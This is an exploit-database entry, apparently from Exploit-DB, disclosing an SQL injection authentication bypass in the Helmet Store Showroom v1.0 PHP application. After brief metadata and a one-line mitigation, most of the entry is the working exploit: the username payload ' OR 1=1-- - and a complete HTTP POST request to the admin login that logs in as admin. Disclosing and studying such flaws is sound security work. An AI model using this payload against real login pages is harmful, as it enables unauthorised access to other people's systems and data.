Helmet Store Showroom v1.0 - SQL Injection

vendor:

Helmet Store Showroom

by:

Ameer Hamza

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Helmet Store Showroom

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE:

CPE: a:oretnom23:helmet_store_showroom:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux, Apache, Mysql

2022

Helmet Store Showroom v1.0 – SQL Injection

Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account. The username parameter is vulnerable to SQLi in login page.

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection
# Exploit Author: Ameer Hamza
# Date: November 15, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.

[+] The username parameter is vulnerable to SQLi in login page
[+] URL --> http://localhost/hss/admin/login.php
[+] Username = ' OR 1=1-- -


HTTP REQUEST


POST /hss/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/hss/admin/login.php
Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa

username='+OR+1%3D1+--+-&password=1234